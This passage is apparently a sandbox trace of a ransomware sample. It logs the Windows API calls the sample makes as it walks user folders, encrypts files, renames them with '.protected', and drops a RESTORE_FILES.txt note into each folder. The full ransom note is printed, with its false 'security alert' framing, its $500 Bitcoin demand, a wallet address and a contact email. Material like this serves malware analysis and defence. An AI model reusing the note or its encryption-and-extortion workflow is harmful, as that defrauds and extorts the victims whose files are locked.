pdwDataLen=0x295eee4*=0x30) returned 1 [0084.520] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\iconcache.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0084.520] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db") returned 60 [0084.520] StrStrW (lpFirst="IconCache.db", lpSrch=".txt") returned 0x0 [0084.520] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db") returned 60 [0084.520] StrStrW (lpFirst="IconCache.db", lpSrch=".rar") returned 0x0 [0084.520] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db") returned 60 [0084.520] StrStrW (lpFirst="IconCache.db", lpSrch=".zip") returned 0x0 [0084.520] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0084.521] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.521] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0084.521] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.521] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0084.522] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0084.522] CloseHandle (hObject=0xd4) returned 1 [0084.522] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db.protected") returned 70 [0084.522] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\iconcache.db"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\iconcache.db.protected")) returned 1 [0084.523] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0084.523] lstrcmpiW (lpString1="Microsoft", lpString2="Windows") returned -1 [0084.523] lstrcmpiW (lpString1="Microsoft", lpString2="Program Files") returned -1 [0084.523] lstrcmpiW (lpString1="Microsoft", lpString2="Program Files (x86)") returned -1 [0084.523] lstrcmpiW (lpString1="Microsoft", lpString2="$Recycle.bin") returned 1 [0084.523] lstrcmpiW (lpString1="Microsoft", lpString2="System Volume Information") returned -1 [0084.523] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft") returned 57 [0084.523] lstrcmpW (lpString1="Microsoft", lpString2=".") returned 1 [0084.523] lstrcmpW (lpString1="Microsoft", lpString2="..") returned 1 [0084.523] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*") returned 59 [0084.523] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0084.524] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.524] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.524] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.524] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.524] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.524] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\.") returned 59 [0084.524] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.524] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0084.524] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.524] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.524] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.524] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.524] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.524] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\..") returned 60 [0084.524] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.524] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.524] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0084.524] lstrcmpiW (lpString1="Credentials", lpString2="Windows") returned -1 [0084.524] lstrcmpiW (lpString1="Credentials", lpString2="Program Files") returned -1 [0084.524] lstrcmpiW (lpString1="Credentials", lpString2="Program Files (x86)") returned -1 [0084.524] lstrcmpiW (lpString1="Credentials", lpString2="$Recycle.bin") returned 1 [0084.524] lstrcmpiW (lpString1="Credentials", lpString2="System Volume Information") returned -1 [0084.524] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Credentials") returned 69 [0084.524] lstrcmpW (lpString1="Credentials", lpString2=".") returned 1 [0084.524] lstrcmpW (lpString1="Credentials", lpString2="..") returned 1 [0084.524] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Credentials\\*") returned 71 [0084.524] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Credentials\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0084.525] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.525] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.525] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.525] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.525] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.525] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Credentials\\.") returned 71 [0084.525] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.525] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0084.525] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0084.525] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0084.525] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0084.525] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Credentials\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\credentials\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.525] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0084.525] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.525] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.525] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.525] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.525] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.525] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Credentials\\..") returned 72 [0084.525] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.525] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.525] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0084.525] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0084.525] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0084.525] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0084.525] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Credentials\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.525] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0084.525] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0084.525] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Credentials\\RESTORE_FILES.txt") returned 87 [0084.525] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Credentials\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\credentials\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0084.526] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.526] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0084.527] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.527] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0084.527] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.527] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0084.527] CloseHandle (hObject=0xd8) returned 1 [0084.527] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0084.527] lstrcmpiW (lpString1="Event Viewer", lpString2="Windows") returned -1 [0084.527] lstrcmpiW (lpString1="Event Viewer", lpString2="Program Files") returned -1 [0084.527] lstrcmpiW (lpString1="Event Viewer", lpString2="Program Files (x86)") returned -1 [0084.527] lstrcmpiW (lpString1="Event Viewer", lpString2="$Recycle.bin") returned 1 [0084.527] lstrcmpiW (lpString1="Event Viewer", lpString2="System Volume Information") returned -1 [0084.527] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Event Viewer") returned 70 [0084.527] lstrcmpW (lpString1="Event Viewer", lpString2=".") returned 1 [0084.527] lstrcmpW (lpString1="Event Viewer", lpString2="..") returned 1 [0084.527] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Event Viewer\\*") returned 72 [0084.527] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Event Viewer\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0084.528] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.528] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.528] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.528] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.528] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.528] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Event Viewer\\.") returned 72 [0084.528] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.528] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0084.528] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.528] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.528] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.528] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.528] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.528] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Event Viewer\\..") returned 73 [0084.528] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.528] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.528] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0084.528] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0084.528] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Event Viewer\\RESTORE_FILES.txt") returned 88 [0084.528] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Event Viewer\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\event viewer\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0084.529] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.529] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0084.529] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.529] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0084.529] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.529] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0084.529] CloseHandle (hObject=0xd8) returned 1 [0084.530] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0084.530] lstrcmpiW (lpString1="Feeds", lpString2="Windows") returned -1 [0084.530] lstrcmpiW (lpString1="Feeds", lpString2="Program Files") returned -1 [0084.530] lstrcmpiW (lpString1="Feeds", lpString2="Program Files (x86)") returned -1 [0084.530] lstrcmpiW (lpString1="Feeds", lpString2="$Recycle.bin") returned 1 [0084.530] lstrcmpiW (lpString1="Feeds", lpString2="System Volume Information") returned -1 [0084.530] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds") returned 63 [0084.530] lstrcmpW (lpString1="Feeds", lpString2=".") returned 1 [0084.530] lstrcmpW (lpString1="Feeds", lpString2="..") returned 1 [0084.530] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\*") returned 65 [0084.530] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0084.542] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.542] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.542] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.542] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.542] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.542] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\.") returned 65 [0084.542] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.542] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0084.542] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.542] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.542] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.542] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.542] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.542] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\..") returned 66 [0084.542] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.542] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.542] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0084.542] lstrcmpiW (lpString1="FeedsStore.feedsdb-ms", lpString2="Windows") returned -1 [0084.542] lstrcmpiW (lpString1="FeedsStore.feedsdb-ms", lpString2="Program Files") returned -1 [0084.542] lstrcmpiW (lpString1="FeedsStore.feedsdb-ms", lpString2="Program Files (x86)") returned -1 [0084.542] lstrcmpiW (lpString1="FeedsStore.feedsdb-ms", lpString2="$Recycle.bin") returned 1 [0084.542] lstrcmpiW (lpString1="FeedsStore.feedsdb-ms", lpString2="System Volume Information") returned -1 [0084.542] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms") returned 85 [0084.542] StrStrIW (lpFirst="FeedsStore.feedsdb-ms", lpSrch=".protected") returned 0x0 [0084.542] lstrcmpW (lpString1="FeedsStore.feedsdb-ms", lpString2="RESTORE_FILES.txt") returned -1 [0084.542] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0084.542] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0084.543] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\feedsstore.feedsdb-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0084.543] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms") returned 85 [0084.543] StrStrW (lpFirst="FeedsStore.feedsdb-ms", lpSrch=".txt") returned 0x0 [0084.543] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms") returned 85 [0084.544] StrStrW (lpFirst="FeedsStore.feedsdb-ms", lpSrch=".rar") returned 0x0 [0084.544] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms") returned 85 [0084.544] StrStrW (lpFirst="FeedsStore.feedsdb-ms", lpSrch=".zip") returned 0x0 